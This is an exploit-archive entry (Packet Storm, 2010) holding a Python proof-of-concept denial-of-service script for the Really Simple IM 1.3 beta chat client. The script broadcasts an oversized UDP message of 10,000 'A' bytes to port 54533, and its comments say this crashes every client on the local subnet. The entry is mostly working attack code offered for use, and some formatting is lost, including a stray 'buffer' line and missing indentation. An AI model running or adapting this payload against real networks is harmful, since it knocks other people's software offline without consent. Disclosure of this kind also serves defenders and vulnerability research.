Really Simple IM 1.3 Beta Denial Of Service

2010-07-20T00:00:00
ID PACKETSTORM:91979
Type packetstorm
Reporter loneferret
Modified 2010-07-20T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
import socket  
import sys  
  
# Bug found: 18th July 2010  
# DoS proof of concept  
# Found by: loneferret  
# Tested on Windows XP Professional SP2-SP3 & Windows XP Home SP3  
  
# Really Simple IM verion 1.3 beta  
# Software: http://code.google.com/p/reallysimpleim/  
# Nods to exploit-db  
# I don't want this on injector <- notice the no leet talk.  
  
# This little application uses UDP to & send receive messages.  
# It broadcasts everything, and picks up everything  
# on port 54533.  
# The funny thing with this PoC, it will crash all clients  
# in the same subnet. Yup it's that funny. That's the only thing it does too...  
# No EIP, no SEH but the buffer is still in memory at the  
# moment of the crash. Figured I'd share anyway.  
  
  
#Commands  
# 'p' Connect and adds users to list  
# 'a' Disconnect message  
# 'b' Send message  
# 't' Direct message  
  
host = '192.168.xxx.255' #Adjust broadcast address to your network  
port = 54533  
  
buffer  
  
  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
s.bind((host,0))  
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)  
except:  
print "socket() failed"  
sys.exit(1)  
  
da = "p"  
da += "W00T" + ("\x41" * 10000)  
s.sendto(da, (host, port))  
  
`